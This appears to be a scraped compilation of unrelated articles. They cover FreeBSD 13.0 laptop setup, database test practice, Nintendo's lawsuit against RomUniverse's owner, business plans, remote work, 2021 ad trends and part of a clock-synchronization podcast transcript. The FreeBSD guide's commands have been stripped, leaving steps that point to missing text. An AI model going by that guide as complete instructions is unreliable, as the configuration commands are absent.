With the release of FreeBSD 13.0 on the horizon, I wanted to see how it shapes up on my Lenovo T450 laptop.  Previous major releases on this laptop, using it as a workstation, felt very rough around the edges but with 13, it feels like the developers got it right. I like to keep things simple when it comes to a desktop operating system so the description below is how I went from a fresh install of FreeBSD 13.0RC1 to a working environment that is based on using the XFCE4 desktop experience. The FreeBSD install process is simple and well documented in other official locations, so I am not going to repeat that here.  However, some of the configuration items that I did select was to use ZFS on Root, encrypted swap and disabled all services (this is a workstation, not a server). Once the machine had been rebooted, we need to set it up so that suspend/resume works correctly (and tests as such) and enable power management.  The main issue that people have getting the resume part of the suspend/resume to work is not having the drm or xf86 drivers loaded that are applicable to the onboard graphics. For the T450 here, we have a standard Intel graphics chipset.  Install the following binary packages for the i915 drivers, enable them and the power management services, then reboot your machine for testing: Once the machine has rebooted, you can test to see if your laptop can go into a suspend state and then resume without issue: This will send the laptop into the S3 suspend state. Wait 30 seconds and then briefly press the power button. If all is working correctly, your laptop should come back to life including the screen.  This has been ‘hit and miss’ on the T450 in previous versions but seems to be working ok on 13.0. Just a note, if you do experience some issues here, make sure your bios/firmware has been updated to the latest release. If the above worked ok, then you can set the sysctl parameter to suspend on lid closure: Also set it in the sysctl.conf file so it is set correctly each boot: The final thing to do is load up xorg, XFCE4 and a few of our favourite apps to get us going. Once all the packages have been installed, enable dbus, slim and openntpd then start the services (except slim, reboot when you are ready to start XFCE4): At some point, I’ll change to the OpenBSD ksh shell (oksh in FreeBSD packages) so I’ll add an entry into the ~/.profile file to read in ~/.kshrc And the skeleton of my ~/.kshrc file will look something like the following: Log out and log back in to ingest the above environment variables (or wait for the reboot below). The final part is to get a vanilla XFCE4 desktop setup and enable/disable some of the default settings so the desktop works efficiently with the suspend/resume function and change the screensaver/lock screen. Setup the slim display manager.  Edit the /usr/local/etc/slim.conf and change the default theme to slim-freebsd-black-theme: Set XFCE4 to auto-start after login, create the ~/.xinitrc file and then insert the lines: Restart the laptop for the DM to take affect (this will also allow reboot and shutdown directly from within XFCE4 for users): Login and once at the XFCE4 desktop, go to Applications -> Settings -> Settings Manager In settings, scroll down to System and select ‘Session and Startup’ Select ‘Application Autostart’, de-select XFCE Screensaver, select both Screensaver and AP-SPI D-Bus Bus. Once the above is done, log out of XFCE4 and log back in, then you can configure the xscreensaver program as well as being able to suspend and resume your laptop by closing and opening the lid at any point in the use of the laptop.
86
The argument against clearing the database between tests (2020)
Some reasons why you might not want to remove data from the database between automated tests: speed, correctness, data growth issues and parallelism advantages I'm of the school of thought that most useful "unit" tests should involve the database. Consequently I don't mock out, fake or stub the database in tests that I write. On every project, I had a small piece of test harness code that cleans the database between tests : @before_test def clean_session : for table in all_tables (): db . session . execute ( "truncate %s ;" % table . name ) db . session . commit () return db . session The reason for this was that it seemed obvious that each test should start with a completely clean slate in order to make it a fair test. All other data should be deleted so that nothing from other tests that can get conflated and cause the test to go wrong somehow - either spuriously passing or failing. Recently I've come to the conclusion that it can (but not always) make sense to run the tests with a dirty database - not only not cleaning between individual tests but also not cleaning between whole test runs - and keeping all the old test data around on a (near) permanent basis. Upturning the base assumption that "the database is clean" in a test requires a small adjustment to your mindset. You can't write tests that assume that data it has created is the only thing present, such as this one: def test_adding_a_user (): db_session . add ( user ) # won't work, assumes the only user is the one added above assert db_session . query ( User ) . count () == 1 Instead each test needs to be written to assert only on the basis of data it has created (or has not created). It should handle data created by others. A corrected example: def test_adding_a_user_2 ( session ): user = make_user () db_session . add ( user ) # this is safe, doesn't assume no other users exist assert db_session . query ( User ) . get ( user . user_id ) is not None This isn't an easy change to make in existing tests. The assumption of clean data is tricky to refactor away. There are reasons to consider it though. Tearing down data between tests or schemas between test runs is not free of (computational) charge. The time taken to clean the database is usually proportional to the number of tables and while this cost is small to begin with it can grow over time . When you have a large number of tests this per-test overhead becomes a problem. My personal experience is that the problem starts to get serious when you have around one hundred tests. For the typical test suite tearing down data can take anywhere from one to ten percent of total runtime, depending on how efficiently it's done. There are ways to be quicker, here are a few: That all aside, the fact remains that tearing down the database is never as fast as not tearing it down. One perennial problem with code that uses data is that when the volume of data grows the performance can change considerably: when there are just three rows in a table a logarithmic time operation (fast) is indistinguishable from a polynomial time operation (slow) . It's a sad fact that the majority of tests and indeed most development time is spent with the database in an empty or nearly-empty state. As a result there is a loss of feedback. Without the daily experience of running with realistic data sets, detecting a slow data access pattern requires thoughtful analysis and/or experience. When your tests don't clean the database your test database will slowly fill with data which is, although not a complete match with the shape of production, presumably along similar lines. Sometimes you will notice problem queries before finding out in production and without doing analysis. Better yet, when your tests don't assume they're starting from a clean sheet, you can run your tests with a dump from production loaded into your database. This can help confirm that data access patterns you're using will work when the database, as a whole, is at production size. Testing-by-example (as opposed to property-based testing) is based on the programmer coming up with examples of inputs and asserting that when given those inputs the program produces the right outputs - or at least - the right sort of outputs. There is also the implicit assertion (present in all automated tests) that the program does not raise an exception or crash. Hopefully, at least some of the residual data your tests leave behind is highly contrived and contains lots of "bad" data and error cases. For example: users that have started the order process but who haven't gotten as far as entering their email address, users who have been marked as duplicates, users whose names contain semi-colons and so on. Running your tests in the presence of all this realistic wonky data can help tease out real bugs. If one of your tests inserts customer names based on the Big List of Naughty Strings then you might find more bugs in other areas when other tests exercise different parts of the same system. Of course - you shouldn't rely on such "atmospheric" bad data as an aid to correctness. Each time you find a new bug based on bad data left lying around from another test or loaded in from production a new, specific, test should be added for that condition. However having a load of crap data loaded can help uncover issues that might not otherwise have been uncovered at the development stage. Test parallelism is often discussed but my experience is that relatively few projects ever implement it, even though quite a few would benefit. The problem is as follows. At first your tests are fast because there aren't many of them and so most teams put off parallel tests until "later". When "later" arrives, the build is now slow and test parallelism would help but it's usually not easy to adapt existing serial tests to run in parallel. This is because tests typically manipulate state in odd ways and if each test assumes they are the only process manipulating state they tend to need complete isolation to be able to run in parallel - separate database instances, separate S3 test doubles - even separate filesystems occasionally. Complete isolation is expense, hassle and more moving parts (8 SQL databases for an 8-process test suite is no fun). Tests written to assume the presence of irrelevant data are much easier to parallelise - usually it can all be done within one environment. This makes it easier to do and so much more likely to happen. When a test is failing for a reason that isn't understood the debugging method is simple: run only that test, in isolation, and narrow it down until the issue is understood. This is more difficult when the database is full of background data - you aren't starting from a "clean" state. I don't think this is an insurmountable problem - in this case, just change to running with a clean database until you can diagnose the problem. Perhaps it's worth backing up the original dataset so you can refer to it later. Running tests designed for "dirty" datasets with clean datasets is not a problem - it's easy to switch back to using a clean dataset. Going in the other direction is much harder. Some tests have very different preconditions - one test might require that a certain type of data is absent while other tests will add this data (or will have added it in previous runs). These types of tests are difficult to adapt but hopefully fairly rare. If they can't be reworked and really are essential they can be run against a second instance of the data store in question that is cleaned between test runs. I haven't used this technique in many places and have only use it myself for a short time. The idea for it came to me when I saw a traditional, PHP-style, hand-crafted test database that wasn't being reset between tests (but which is reset between test runs). While I'm not a fan of that approach it got me thinking. I've since tried not tearing down the database on a side project, to some success. I'm ready now to try this strategy in more places, bolstered by the knowledge that if tests are written for a dirty database it is very easy to change them to running with a clean database later (usually you don't have to do anything).
1
Despite $2.1M ruling, RomUniverse owner considers bringing back ROM site
In May, a US District Court for copyright and trademark infringement. Now, Nintendo is seeking an additional permanent injunction against Storman, who it says is considering bringing the ROM site back without "Nintendo content" and who has failed to make a $50-per-month payment toward those damages. Storman—who said in court documents that his post-RomUniverse income was derived primarily from "unemployment and food stamps"—seems unlikely to ever pay even a small chunk of the $2.1 million judgment against him. Paying a token $50 a month, an amount Nintendo says Storman "proposed and agreed to," would mean that fully covering the damages would take Storman 3,500 years, and that's without accounting for interest. Still, Nintendo is using the damages to its advantage, arguing that Storman's failure to make his first $50 monthly payment "demonstrates that Nintendo has no adequate remedy at law for Defendant’s past or future infringement and underscores the need for a permanent injunction." Meanwhile, in a recent filing with the court, Perkins Coie lawyer William Rava recounts a telephone call he had with Storman on June 3 after the court's original ruling. In that call, Rava said, "Mr. Storman stated that he was still considering what to do with RomUniverse and that if he were to bring back the website, it might have video game content and ROMs from companies other than Nintendo but would not have Nintendo content." "The Opposition does not dispute that [Storman] is considering relaunching the RomUniverse website to continue to distribute video game ROMs," Nintendo writes in a filing based on Rava's deposition. "Nor does it assert that this future use will not violate Nintendo’s intellectual property rights." Storman's statement brings up an interesting legal distinction between games developed and/or published by Nintendo and third-party games that merely run on Nintendo consoles. The ruling against Storman focused on 49 games from the former group; those titles were copyrighted and trademarked directly by Nintendo. But Nintendo has less of a legal claim on hundreds of other ROMs that run on Nintendo consoles but whose copyrights and trademarks are owned by other companies (which are responsible for protecting those rights). Even if a ROM site ignored all Nintendo-published games, though, it could still face legal trouble from Nintendo for misusing trademarked console names and imagery or for suggesting a legitimate relationship with Nintendo's console hardware that doesn't exist. The , for instance, doesn't officially include any licensed games for Nintendo consoles out of (though some copyrighted NES and SNES games are occasionally uploaded by Internet Archive users before being taken down). Nintendo initially requested a permanent injunction against "future infringement" of Nintendo's intellectual property in its original motion for summary judgment against Storman. While any future infringement would still be illegal in any case, a preemptive injunction from the court would make it much simpler for Nintendo to quickly shut down a new ROM site if Storman sets one up (as he seems to be considering). The judge denied Nintendo's original request on an injunction, saying that the monetary damages and the fact the site was already shuttered weighed against the necessary argument for "irreparable harm." Now, though, Nintendo is citing the new legal precedent of the 2020 Trademark Modernization Act in arguing for a permanent injunction. That act, which passed just before Nintendo first requested an injunction but was not considered at the time, establishes a new "mandatory presumption of irreparable harm" in trademark infringement that Nintendo says should point the court toward an injunction. Storman, who is representing himself in the case, has meanwhile filed his own somewhat rambling motion asking the court to reconsider the statutory damages it imposed in May. "There is no legitimate, admissible evidence that the Court can reasonable [sic] construe to cause it to believe that Plaintiff, Nintendo, sustained any actual damages whatsoever as a result of any of the Defendant’s actions or inactions," Storman writes. In its response, Nintendo argues that it has already "presented uncontroverted evidence that there were approximately 50,000 illegal downloads of infringing ROMs at the time Nintendo filed its Complaint, and that the retail price for the Nintendo Games is between $20 and $60."
1
Show HN: New lite weight tool to conduct JavaScript Interviews
Hey, please click the run button to view logs here Run and View logs
1
How to write one page business plan
Whether you are starting the next big thing with a big team or a micro business that can be operated right from the corner of your home, you do need a business plan. A business plan is an essential document for any business because it acts as a roadmap to the success of the business, and guides you at each stage to make the right decisions. Moreover, it helps you stay focused, plan things in advance and most important of all generate funding. Business plan in its true sense is a detailed document and may contain tens of pages, however, if you are a first time entrepreneur and do not want to spend too much time on creating a detailed document, you can get started with a simple one page business plan. Please, note that “one page business plan” may not exactly be just a single page and if it goes up to two or three pages, it’s still OK. This one page business plan can not be the best alternative to an actual detailed business plan in many cases. For instance,  when you are going to start fundraising, you cannot use this document. Instead, you will need a detailed business plan that covers all the aspects of business, i.e. historical data, current status and expected numbers. A one page business plan best serves the situations when you have time limit to start a business or train your sales and marketing teams to plan targeted campaigns. And yes, a one page business plan can also be considered as the first step to develop a detailed business plan. As a fact of the matter, business plans need to be updated periodically, and getting started with a one page business plan is a great way to outline the most important points and expand each section gradually. Let’s check what it takes to write a business plan and how to start developing this quick and simple business plan. There are few things which must be well researched before starting working on a business plan and here is the list: You might have a killer idea in your mind, but it may not necessarily be equally feasible for the market in reality. Make sure to spend good time researching your business idea and calculating the feasibility of the same. Market research is the most important step after verifying the feasibility of a business idea. Market research includes researching consumer behavior, trends, competition, market saturation, etc. This research enables you to come up with the best offers and gain a competitive edge. It’s very important to conduct a quick research on yourself to identify your own strengths and weaknesses. It will help you identify things that you can do yourself and things that will require help from someone else. Depending on your findings you might want to have a co-founder or a partner onboard or consider outsourcing some tasks. Once you have done this research, developing a simple one page business plan will be a quick and easy affair. With all the data from your research, all you need to do is to put a summary of this data into following sections. A quick note about what you want to do with this business idea and where you want it to be at the end of the year 1, 2, and up to 5 or 10? You might want to expand your business gradually or aggressively or else you may have plans to build a profitable venture and then sell it out. Summarize all these details into a single paragraph. It’s a single sentence that captures your company’s purpose; a catchy slogan that can enhance the brand value. Here are some really great examples of best mission statements for your inspiration. Objectives are the short term goals, i.e. number of users you should acquire in the first, second, third and last quarter of the year, expected quarterly sales & profits, % of market share etc. A quick list of strategies you will be using to achieve the objectives listed above. For instance if you are starting a bakery business, you need to list the following points. Describe how you plan to execute the processes, i.e. when to buy materials, how much to stock, when to restock, how many products to be made, and when and how to transport the goods. The strategic plan for each business will differ, i.e. the strategies that may work for a cleaning business might not be equally effective for a photography business or a real estate business. This section requires careful consideration and you need to list the following: Action plan in the one page business plan should be a simple table of tasks with approximate deadlines, responsible person, and status. This is how a simple one page business plan looks like. One Page Business Plan Template Still not sure how to start developing a quick one page business plan for your new business? We have created a ready to use template of one page business plan to make it even easier for you. One page business plan or a simple business plan consisting of a couple of pages cannot cover all the details of your business, and so may not answer a lot of benchmarking concerns, but it is a great way to get started and you can always develop a detailed business plan out of this simple one page business plan on a later stage.
1
A Verbal Processor's Guide to Working from Home
Article summary Set up a daily team sync, and dedicate part of the meeting to chit-chat. Take a walk and call someone — anyone! Have lunch with a co-worker — virtually. Last March, I found out (like many people) that I’d be transitioning to working from home. As a fairly new employee at Atomic, with only five months under my belt, I didn’t know how to feel about the change. But within a week at home, I was loving it. Endless time with my dog, cozy pajama bottoms, and the ease of tossing in a load of laundry whenever I wanted — what was this beautiful new life?! Now, eight months into working from home, I still do enjoy spending time with my dog (even when he barks during a Zoom call). I still occasionally throw a load of laundry in the washer. And don’t get me started on the loungewear. But emotionally, there’s a gap. You see, I’m a verbal processor in the truest sense of the phrase. When a thought pops into my head, I can’t quite make sense of it until I’m talking it out with someone. So I’ve put together a few tips for my fellow verbal processors to help us get through the rest of this pandemic (however long it may be). Social connections are few and far between these days, and the format of Zoom doesn’t leave much space for casual conversations. On my team of three, we’ve started meeting every morning for a thirty-minute sync to kick off the day. The format typically goes like this: This time is loosely reserved for chit chat. We don’t even think about work during these ten minutes. We talk about things like dogs, our latest cooking adventures, and the deer that keep eating Elaine’s bushes (those darn deer!). To add a little structure to our sync, we each report in about our work using this format: These thirty minutes set the tone for my day. They make me feel connected, socially and professionally, and they offer a space to talk about whatever comes to mind. As bored as I get looking at the same four walls every day, I struggle to motivate myself to get outside. Lucky for me, my dog has no trouble wanting to go outside. So while I’m walking him, I call the one person that I know will always be down to chat — my mom. We talk about our work and our personal lives, and (as a fellow marketer) she helps me brainstorm when things feel blocked. You may not want to call your mom in the middle of the day (I get that), but maybe you have a verbal-processing friend who could use a headspace break, too. Not only will you feel more connected to your network of friends and family, but allowing yourself to have conversations that aren’t so heavy (let it be known, heavy topics include COVID-19) will allow your brain to open up creatively. To hold yourself accountable, put a fifteen- or thirty-minute hold on your calendar each day for your walk time, and stick to it. At Atomic, we have a little program called a Pair Lunch, where the company pays for Atoms to have one-on-one lunches together (with the caveat that each pair of employees only gets one paid Pair Lunch per month). This system is nice because it gives you a chance to chat with people you might not otherwise interact with much. When COVID hit, Pair Lunches didn’t really fit within the “stay at home” protocol, so Atomic implemented Virtual Pair Lunches! Each Atom is now paid for their lunch break when it’s taken during a Pair Lunch. I like to take advantage of Pair Lunches to meet with everyone — folks in my office, folks in our Grand Rapids office, anyone! Taking thirty minutes to sit down, eat my lunch, and have a casual conversation with a colleague has been invaluable. It makes me feel connected and brings back a sliver of the social energy I once got from daily in-person interactions. A few Atoms have even gotten creative with their Pair Lunches, doing things like ordering takeout, cooking their lunches live on camera, or, in lieu of eating, ironing their clothes to keep their hands busy. If you’re a verbal processor who’s working from home, what do you do? Please share your experiences in the comments below!
1
Digital marketers share what’s next in the ad space in 2021
Anyone who’s involved in digital marketing knows this: getting your ads out there is one thing, but actually connecting with your audience in an authentic way can be another. Curious to learn more? We got 7 seasoned marketers to share their perspectives and ideas for what’s to come in 2021 in the ad space. Digital marketing has never been more in than it is right now. All the brands are adopting it, and for obvious reasons: it produces results. The only issue is that millions of other people are fighting for the same attention as you are. The harsh truth? Banking on the same ad strategies you’ve done for the last few years isn’t going to cut it anymore. As your approach needs to change in 2021, we sat down with some seasoned digital marketing specialists from leading brands like Cosette Media, Square, Amazon, and more, to learn what exactly is going to work this year, and why. Let’s dive in! Many marketers haven’t truly understood or just have conveniently overlooked the eventual phasing out of the third-party cookie. Safari and Firefox browsers have already reduced cross-site tracking ability by limiting the cookies and Chrome is to follow suit, leaving us in an unsweetened, ‘cookie-less’ world soon. Not to forget the iOS14 debacle that’s bringing in many restrictions into the world of advertising and has left majority advertisers and publishers uncomfortable to say the least. Third party cookies, mainly from a digital advertising perspective, have been crucial as they provide the ammunition to serve personalized ads, retargeting and enabling advertisers to conduct detailed analysis. In 2021, brands and marketers together will need to revisit their audience strategies to focus more on how they can best pivot towards leveraging and developing their first-party data. Whether that is developing a robust email marketing system or a lead generation campaign or something totally revolutionary, brands in 2021 will need to leverage tactics where they can collect information about their consumers first-hand. Due to the pandemic, we’ve not only seen a dramatic uptick in the social media user base but also the engagement. Social platforms will continue to prove to be an effective avenue for brands to connect with consumers, more than ever, as in-person customer experiences are heavily impacted in the wake of this global pandemic. Platforms like Facebook are progressing to be almost like a one-stop-shop that can help brands to effectively tell their story, mission and touch user’s lives through their social media presence and deliver true engagement. Social commerce, particularly, would also continue to grow as it provides a seamless path to purchase from prospecting to conversion. It will be crucial for marketers to adapt to these new avenues that not only help potential customers discover the product/service, deliver innovative online experiences, but also drive purchases without having to leave the platform! Today’s marketing efforts are following the consumer demand to move away from superficial and sales-focused content to a more purposeful, value-driven approach. Brands are therefore searching for effective ways to connect and share their message with their target audiences without sounding salesy. This is exactly what influencers enable brands to achieve. In 2021, brands will likely invest in long-term relationships with genuine influencers versus one-off campaigns to together develop a valuable, loyal consumer base. It’s interesting to see how brands have always attested to content’s credibility but now, the content creators will bring credibility to the brands. Influencer marketing is also overcoming one of the main issues it has been facing – trackability. As the investment in influencer marketing grows, platforms like Facebook are continuing to build measurement tools for these campaigns which will only become more robust in time to come. As a consumer, we’re loyal to brands that take our feedback constructively or act upon our recommendations. When we talk about personalization, what we truly are seeking from brands is the feeling of being ‘heard’ or ‘recognized’. Interactive ads is one of the ways that brands can implement personalization and develop a more valuable and personal connection with their target audience. When I’ve personally experimented with messenger bots or experiential display ads, it has almost always resulted in better engagement which in turn has resulted in an impressive ROAS as well. Not to forget, interactive ad formats such as videos or Instant Experience ads on Facebook or Instagram also help in developing a retargeting pool based on users who engage with them which later can be re-targeted with relevant ads. This is an excellent use case for leveraging interactive ad formats especially in the times where the cookie is diminishing and retargeting opportunities are narrowed. Interactive ads not only help in effective performance but also aid in telling a story, creating a lasting impression and heightening brand recall. Not to forget, when users interact with polls, for example, this also serves as a thermometer for the brands to gauge user preferences which can further help brands to develop certain products or pivot their marketing strategy. Digital marketing is becoming increasingly about community building and authentic engagement. Last year, brands had to look for ways to exhibit more warmth and compassion in response to the challenges customers faced relating to the pandemic, economic downturn, and social unrest. This is going to continue in 2021. Customers are using their spending as a way to reflect their sense of self-identity, so brands have to show that they align with customer values and concerns. I think we’re also going to see more innovation and creativity when it comes to digital campaigns. People are tired of the same old podcast and webinar formats. The most successful marketers will be those who can figure out how to push boundaries and excite their audience with new, interactive virtual experiences. A lot of ads in 2020 leveraged nostalgia to evoke a sense of comfort and warmth in audiences, such as Airbnb’s collaborative campaign with Blockbuster and the Fresh Prince of Bel-Air. In a scenario where budget could be limited, brands need to start conversations with consumers who are looking for real connection and trustworthy information so I think earned media will take an important role in this case. I’m not just thinking about blogs, but also about platforms like Live Events that became popular during the quarantine. With regards to paid channels, the must-haves (Facebook, Instagram, Google, YouTube) will always be there, while, among “newer” channels, I found TikTok particularly promising as it grew +75% in 2020. Still, I’d recommend brands testing this channel only if their target is actually there. In a nutshell, I think ad creatives in 2021 will be about authenticity. Today, consumers want it all: quality, a flawless and tailored experience, value orientation, price, newness. It won’t be enough to simply say “just do it”. So the four principles that will guide me to create relevant ads in 2021 will be: Video is obviously the front that most brands are going to be fighting for. No matter what it’s for –  webinar, classes, course, virtual events, social, or more. I think that there are still gaps for brands to explore in other forms of video. Short-form video is about to see a big rise in popularity with TikTok, Reels, and Facebook taking off. Also, live videos on Facebook and LinkedIn will continue to soar, helping B2B companies stand out from their competitors. What not to do in 2021? I think clickbait has all but died its death. If you’re employing clickbait headlines in your work, chances are, you’re doing this because you want a high number of page views. Unfortunately, this is an incorrect way to measure success. The Internet has allowed untruthful materials to spread and, as a result, this has led to a crackdown on clickbait. Since social media giants like Facebook have announced changes to its algorithms to combat this type of content, consequently, those marketers continuing to use clickbait tactics might be penalized by social media networks in the future. I think this year will be more about personalized marketing and offering an improved user experience (UX) by serving relevant content, or targeting key messages in the funnel, based on your customer’s behavior. So I think marketers will focus a lot more on retargeting ads. As customers communicate through diverse digital marketing channels, especially now people are leading an enhanced digital lifestyle, marketers feel more driven to connect them across all the channels customers frequent the most. Following some basic ground rules has always worked for me. I normally follow things like: Social media and community-building will increase their importance and creative content marketing continues to thrive and further diversify (mostly in the form of live, video, and audio). Businesses should focus on building a strong funnel, improve every step consistently and implement rapid experimentation processes to optimize marketing campaigns and overall business performance. With an increasingly quick rate of innovation, it’s important to not only focus on new tactics, but always follow a solid strategy covering the core pillars. It’s going to be interesting how digital marketing might change due to the iOS 14 update. Having a good ad strategy is key to refine your targeting and find the most profitable audiences. This is now severely threatened. At the same time, ads will become more entertaining, awake more emotions, and get you on the edge of your seat. The rationale is to capture and keep attention in a world that’s busier and buzzier than ever before. Finding your ideal target audience and addressing them in the right tone of voice and in the right channels is more important (and at the same time more complex) than ever before. People want businesses that reflect their values. Amidst the pandemic, there was a renewed global Black Lives Movement addressing racial injustice. For many consumers and brands, 2020 served as a necessary interruption to ‘business as usual’ and a wake-up call for those who hadn’t been paying attention. Unprecedently, we began to see concentrated strategies for connecting with Black communities were now on the agenda. In 2021, I believe that we will see that the groundwork that was laid in 2020 will come to fruition. We’ve already started to see some of those pivots such as Netflix’s dedicated category to Black filmmakers, or banks that now have specific customer strategies for Black communities to personalize their marketing efforts. Customers have been holding companies accountable for the commitments they make, and continue to drive a responsive and conscious approach to business. There are many different strategies and various technological solutions to go to market with personalized ads. However, before that, I believe we need to take a step back and ensure that the right people are employed at your company. The first step to creating more personalized and relevant ads is ensuring that brands themselves have the right people around their table. Employing and supporting Black employees and others from marginalized backgrounds is foundationally necessary to producing authentic content and marketing strategies in a country as diverse as Canada. With the underrepresentation of Black people in marketing and racialized people more generally in positions of leadership, there are a number of great organizations working to close the gaps like POCAM and Icon Talent Partners. The quest for digital marketers in 2021 subsists in the subtle art of maintaining relevance, targeted penetration, and frequency as factors for reconnection. Today, the influence to purchase is heavily diluted by a frenzy of pandemic reactivity in the over-production of content with numbing sameness. What will work? Entertainment. Video content has largely replaced all “Through The Line Marketing” (TTL) strategies. This is a huge opportunity for Ad Tech to answer to brand propositions seeking to entertain. Dynamic video innovations which seek to deliver entertainment in captivating content will generate product sales. What won’t work? Copy-cat campaigns which are unlikely to achieve growth. Our FMCG strategy will be focused on dynamic video ads designed for audience content creation, tackling influence, participation, identity, and incentive to purchase. It doesn’t get more personal than self-involvement with the brand world. Your digital marketing is no longer as simple as blasting out ads to everyone and calling it a day. Millions of other marketers are competing for their audience’s attention, devising strategies and tactics that will impact your ability to stand out. In 2021, don’t fall behind repeating the same ad strategies that worked in the past few years. Instead, break ground with contextual content, be tactical about privacy issues, and engage with the community in an authentic way to actually drive results. If you’d like to read similar pieces, we’re delivering the same level of quality insights from top industry leaders right into your inbox once a month. Let’s connect!  💌
69
Clock Synchronization (2020)
Clock synchronization, keeping all of the clocks on your network set to the “correct” time, sounds straightforward: our smartphones sure don’t seem to have trouble with it. Next, keep them all accurate to within 100 microseconds, and prove that you did -- now things start to get tricky. In this episode, Ron talks with Chris Perl, a systems engineer at Jane Street about the fundamental difficulty of solving this problem at scale and how we solved it. Welcome to Signals And Threads, in-depth conversations about every layer of the tech stack from Jane Street. I’m Ron Minsky. Today we’re going to talk about a deceptively simple topic: clock synchronization. I think there’s nothing like trying to write computer programs to manipulate time to convince you that time is an incredibly complicated thing, and it’s complicated in like 16 different ways, from time zones to leap seconds to all sorts of other crazy things, but one of the really interesting corners of this world is how do you get all of the clocks on your big computer network to roughly agree with each other? In other words, clock synchronization. So we’re going to talk about that with Chris Perl, who’s a sysadmin, who’s worked at Jane Street since 2012. Chris is better than anyone I have ever worked with, at diving into the horrible details of complex systems and understanding how they work and how they can be made to work better, and he’s done a lot of work here, specifically on clock synchronization, and has, in the course of that, redone our entire system for doing clock synchronization, so he’s had an opportunity to really learn a lot about the topic. Chris, to get started, can you give us just a quick overview of how computer clocks work in the first place? So, I guess the rough gist is something like you have some oscillator, a little crystal effectively that’s inside the computer that is oscillating at some frequency, and that’s driving an interrupt that the operating system is going to handle in some level – there’s probably lots of details here that I’m just skipping over – but that’s driving an interrupt that’s going happen in the operating system. And the operating system is using that to derive its notion of time, and so if you have a really high-quality oscillator, and those timer interrupts happen at the right rate so that you’re tracking real-time that might just happen, and if your oscillator’s very good, and very stable you could actually just be pretty close to the correct time just by virtue of that. But the truth is that most computers come with fairly bad oscillators and they change their frequencies for various reasons like heat, so if you are using your computer to compile the Linux kernel or something like that, that could change the heat profile, change the frequency of the oscillator, and actually change how well you’re doing of keeping real time. When we naively think of clock synchronization as people, we think of it as like, “I’m going to go set my clock”. I’m going to look at what time it is and adjust my clock to match whatever real-time is, but you’re actually talking about a different thing here. You’re talking not just about setting what the right time is right now but keeping that time correct, essentially keeping the rate at which time is going forward in sync. Correct. You’d love it if you could get like a really, really high-quality oscillator for super cheap in all your computers and then you wouldn’t need a lot of adjustment to get them to keep the correct time, but that would be really expensive. You can buy such things, they just cost a lot of money. So, you say that heat and various other things that are going on in the computer will cause this rate at which time is appearing to march forward inside of your computer to drift around. How accurate are these? Can give me a kind of numerical sense of how far these things drift away? The stuff that we run, we capture some of these statistics, we see machines that have a frequency correction applied to them of, say, 50 parts per million, which is like microseconds per second, so that works out to roughly a couple seconds per day, is how you would wind up drifting off. But I’m sure that if you had a super old desktop under your desk, that you stole from your parents or something and you were trying to rebuild into a Linux box, you might have worse numbers than that. Like a sort of relatively current generation server from a well-known vendor, you’re talking somewhere around 50 to 100 microseconds per second that they can sort of walk-off out of alignment. Okay, so clock synchronization is the process of trying to get all of those clocks that you have across your whole data center and across multiple data centers to be in sync with each other. Is that the right way of thinking about it? I think so. “In sync”, is an interesting sort of thing to say, right? You kind of would like that if you were able to instantaneously ask two random servers on your network, what time it was at the same exact point in time, if you could somehow magically do that, that they would agree to some relatively small margin of error, and I think that that’s kind of what we mean by clock synchronization. That if you could somehow magically freeze time and go ask every single computer on your network, “Hey. What time do you think it is?” that they would all roughly agree to within some error bound that you can define. Right. And this basic model actually assumes that there is a well-defined notion of what it means to be instantaneously at the same time, which isn’t exactly true because of relativity and stuff like that, but we’re going to mostly ignore that. So, I guess one property that you’re highlighting here is having the clocks agree with each other, and that’s part of it, but there’s another piece, right, which is having the clocks agree with some external reference. There’s some notion of like, what does the world think the time is? So, where does that external reference come from? I’m not an expert on this stuff, but I’ll give you the sort of 10,000-foot view. You have various physics laboratories all over the world, like NPL in the UK, and other places across the world. They all have measurements of what they think time is, using things like hydrogen masers and sort of very accurate atomic methods. They contribute all of that stuff to a single source who kind of averages it, or does some sort of weighting, to come up with what the correct time is, and then you kind of magic that over to the Air Force, who then sends it up to the GPS constellation. And GPS has a mechanism for getting time from the GPS satellites down to GPS receivers, and so if you’re a person who runs a computer network and you’re interested in synchronizing your clocks to a relatively high degree of accuracy with something like UTC, which is effectively Greenwich Mean Time, it is just sort of the current time without time zones applied. If you’re interested in doing that, what you can do is you can just go out to a vendor and you can buy a thing called a GPS appliance, which can hook up to a little antenna that goes onto the roof. It can receive this signal from the GPS constellation and basically gives you out time, and the accuracy there is something like maybe 100 nanoseconds or so. So you’ve got the sort of atomic measurements being fed up to a GPS constellation, down to GPS receivers that you, as an operator of a computer network, can buy. And for the purposes of this conversation, we’re going to treat those GPS receivers as the received wisdom as to what time it is, and our job is to figure out how, inside of a computer network, you make all of the different devices agree with each other and agree with that external reference. Why is it important? What does having synchronized clocks help you do? If you put yourself in the shoes of a financial regulatory authority, and you have all these different participants out there doing stuff with computer systems, and something weird happens, and you’d like to come up with a total ordering of events of what led to this crazy thing – or what led to this good thing, who knows – but you want to have a total ordering of events. If people don’t have good clock synchronization, to some external source, you can’t compare the timestamp from participant A to the timestamp from participant B, so if you were to decree everybody must have time that is within some error bound, you know if these timestamps are within that error bound, well, then I can’t be sure about the ordering, but if they’re farther away than that then I can be sure about the ordering. I can know which one came first and which one came second, and that can be very useful. So that’s the motivation that’s very specific to our industry, but don’t people in other industries care a lot about clock synchronization, too? I would have thought that there are other reasons that would drive you to want to synchronize the machines on the network. Oh, sure. There’s lots of different things. I mean, just like a general sysadmin topic, a lot of times you want to gather logs from all the systems on your computer network, and you want to analyze them for various reasons. Maybe it’s because you’re concerned about intruders. Or maybe it’s because you’re just trying to understand the way things are functioning, and if your clocks aren’t synchronized it’s very hard to kind of understand things that might have happened on system B and how they relate to system A because the two timestamps are just not – you just can’t compare them if they’re not synchronized. And I suppose there are also some distributed systems, algorithmic reasons to want clocks. Certainly, some kinds of distributed algorithms end up using clocks as ways of breaking ties between systems, and so that requires at least some reasonable level of synchronization. For sure. There’s also other network protocols that are widely used that require clock synchronization, but much less precise levels of clock synchronization. Kerberos is a widely used authentication protocol, and that requires that the clocks be synchronized to within five minutes, and the idea there is to thwart replay attacks, and stuff like that, making sure that somebody can’t obtain your credentials from a couple days ago and use them again, that kind of thing. So there, it’s like the error bars are very wide but there’s still some sort of synchronization necessary. Right. And I guess that’s a general theme when thinking about synchronization: different applications require different levels of synchronization, but more closely synchronized never hurts. There’s definitely tradeoffs as you start to get into the lower bounds, but yeah. If they were all free, sure, I’d like to have them exactly the same. How do people normally approach this problem of clock synchronization? What are the standard tools out there? 